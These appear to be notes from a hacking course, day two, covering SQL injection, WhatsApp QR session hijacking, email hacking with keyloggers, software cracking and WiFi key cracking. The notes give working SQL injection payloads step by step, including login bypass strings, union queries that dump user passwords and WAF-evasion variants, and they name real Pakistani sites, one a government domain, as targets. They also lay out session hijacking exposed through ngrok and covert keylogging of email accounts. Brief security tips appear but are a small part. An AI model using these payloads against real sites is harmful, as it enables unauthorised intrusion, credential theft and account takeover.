Day 2

-----
Web Application Hacking and Security
------------------------------------
Website: Collecetion of pages is known as website.

Types of Websites

Static : A Website will have no database inside it hence user can see the content
of the website but can not input anything from users's side.

For Example: Pure HTML Site.

Dynamic : These websites carry database with in hence it has lots of user
interaction area's from where user eneters information/data which goes and save in
the backend.

For Example: facebook,google,twitter,ums etc

OWASP TOP 10 Attacks
O : Open
W : web
A : Application
S : Security
P : Project

www.owasp.org

SQL Injection
-------------
SQL : Structured Query Language

DDL : Data Definition Lanaguage

DML : Data Manupulation Lang.

DCL : Data Control Lang.

Attack 1: Authentication Bypass Attack
--------------------------------------
When a hacker tries to bypass the login panel of the website and gain access of the
admin panel with all features through which he/she can manupulate the website
content.

Target : safesecurities.com.pk

userid=osama admin
password=bomb admin

select * from userstable where userid='osama''or'1'='1 and password='bomb''or'1'='1

'or'1'='1

Union Based Injection
---------------------
DVWA

D : Damn
V : Vulnerable
W : Web
A : Application

Download : www.dvwa.org

Requirements
------------
1. XAMPP Server (To make your computer as server)
X : Cross Platform
A : Apache
M : MY-SQL
P : PHP
P : Perl

Download: apachefriends.org
2. DVWA :Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
vulnerable. Its main goals are to be an aid for security professionals to test
their skills and tools in a legal environment, help web developers better
understand the processes of securing web applications and aid teachers/students to
teach/learn web application security in a class room environment.

3. Copy and paste downloaded files in c:/xampp/htdoc folder

127.0.0.1/dvwa

username=admin
password:password

Step 1: Target
http://192.168.235.174/dvwa/vulnerabilities/sqli/

Step 2: Find any GET method in the URL of the website

GET : www.gmail.com/php?id=10
POST : www.gmail.com/id/
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

Step 3: Check the exception handling
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#

Step 4: Total number of columns from the respective table where id is a column.
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' order by 1--
+&Submit=Submit#

Step 5: Dump the left 2 columns on the right hand side.
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,2--
+&Submit=Submit#
Step 6: Get the database and version name
Database->Tables->Columns->Data
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select
database(),version()--+&Submit=Submit#

Step 7: Get the entire tables of the webiste from the database.
Schema: Database ki MAA.
Tables :information_schema.tables

Columns:information_schema.columns

http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,table_name
from information_schema.tables--+&Submit=Submit#

Target Table Found : users

Step 8 : Get the columns of the users table
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select 1,column_name
from information_schema.columns where table_name='users'--+&Submit=Submit#

Step 9 : Get the data from user and password columns
http://192.168.235.174/dvwa/vulnerabilities/sqli/?id=1' union select user,password
from users--+&Submit=Submit#

Bypassing Firewall aka Union Based Injection via Web Application Firewall
techniques
--------------------------------------------
Target: multan.gov.pk

Step 1: FInd GET method in the URL
http://target.com/files.php?id=1

Step 2: Check the exception hanlding
http://target.com/files.php?id=1'

Step 3: Count the total number of columns
http://target.com/files.php?id=1 order by 3--+

Step 4: Dump the columns on the right handside.
http://target.com/files.php?id=1 union select 1,2--+

Bypassing Technique 1:
Upper Lower Case
union select
UnIoN sElEcT -> new payload

http://target.com/files.php?id=1 UnIoN sElEcT 1,2--+

Bypassing Technique II:Inline Comments
--------------------------------------
Executable inline comments

/*!UnIoN*/ /*!SeLeCt*/

http://target.com/files.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2--+
Bypassing technique 3: Version Based Inline Executable Comments
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+

My-SQL
1.00.00 : 10000
2.00.00 :20000
3.00.00
4.00.00
5.00.00 : 50000

STep 5: Get the database
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+

Step 6: Get the tables of the database
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/
/*!from*/ /*!information_schema.tables*/--+

Target Table : users

Step 7: Get the columns
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!
50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!
50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+

Step 8: Get the login and password
http://target.com/files.php?id=1 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from
users--+

Secure
-------
1. Do not run waf with default security settings
2. Keep update on new blacklisted parameters for waf
3. Make sure you do the custom changes in the WAF as per attack you are getting
4. Never off the firewall interms of fast response expectation in traffic.
5. have good validation of received queries and inputs at server level also.

Whatsapp Hacking Attack : QRLJACKING
------------------------------------
Step 1: Download Kali Linux (2.99GB)
kali.org
How to Install and RUn : Watch: https://www.youtube.com/watch?v=3ycEhwrkKYU

Step 2: Run and fill the username and password
username: root
password: toor

Step 3: Download QRLjacking code from Github
Open Terminal: git clone https://github.com/OWASP/QRLJacking.git

Step 4: Open QRLframework folder
Step 5: give permissions to qrljacker.py
chmod +x qrljacker.py
Step 6: Run it in terminal ./QrlJacker.py
Step 7: Select Chat Application -> Whatsapp -> Select Port 1337

Step 4: To make this fake whatsapp QR code LIVE on internet.
Download a service AKA: ngrok
https://ngrok.com/download
Facebook | Email Hacking Methods
--------------------------------
Family Keylogger : http://www.spyarsenal.com/download.html

How to Secure your Email Accounts
---------------------------------
1. Always use a pass phrase instead of a password.
2. Always use a robust password
howsecureismypassword.net

checkurcardhackedornot.com
Card no Expiry Date and CVV : Check

oncetherewasacrow

3. *&Ig3SimG&*
4. Active 2 Step Verification in your Gmail.
5. Facebook: Backupcodes
6. Always check ur login activites from Gmail to see any unauthorised access.

Reverse Engineering | Cracking LIVE
-----------------------------------
Reverse Engineering

Engineering : The goal of eng. is to build something.

High Level : ENG : C C++ Java Python

Middle Level : Assembly : .obj

Low Level : Binary : .exe

Requirements
--------------
1. OllyDBG
2. Perfect Keylogger
3. Windows Platform

Target : http://www.blazingtools.com/downloads.html

Wifi Hacking
-------------
Wifi Hacking: Wifi Stands for wireless fidelity. It works on protocol 802.11a
onwards. Goal is to provide a wireless connectivty between hosts for data and
information transfer and establish a valid communication channel for the same.

Types of KEY Security Encryptions
---------------------------------
1. WEP : 64bit
2. WPA : 128bit
3. WPA-2 PSK <--- Target 256 and above

Problem : You cannot brute force the kEY.

How to Crack then : Dictionary Based Attack

Requirement
-----------
1. Kali Linux 1.8 version (old)
2. airmon-ng : This application is a CLI based used to put your wifi device inot
monitoring mode and check if its capable of proceeding with the attack.
3. airodump-ng : This application will help you to dump the air packets and
identofy that how many wifi access points are there near by you so that you can
select the target to test its security.
4.macchanger*: This helps you to spoof your wifi adpaters real identity with fake
mac address in case you want to do anonymous security testing.
5. aircrack-ng : This application will help you to crack the key which you
extracted while wifi hacking process and will help you to match with the dictionary
and if found will show the key.

rahul -->!@#$% --> Mobile

Router:rahul->!@#$% <---- !@#$%---rahul

Network Attacks : Exploitation
------------------------------
Active Attack : This attack is mainly concerned with the device direct
attack.Hence we get the IP of teh device and then attack on the IP directly, the
main goal of this attack is either to gain access to that device or if failed then
down the host.

Example: Router DDOS Attack, DHCP Starvation Attack with Yersinia and websploit
wifi jammer

*Requirement : websploit in Kali Linux
Step 1: Open terminal and type websploit

Step 2: To see the cli network attacks type show modules

Source Tute:https://www.youtube.com/watch?v=I4OPAdE5yv8

Source Article: http://www.hackingtutorials.org/metasploit-tutorials/websploit-
wifi-jammer/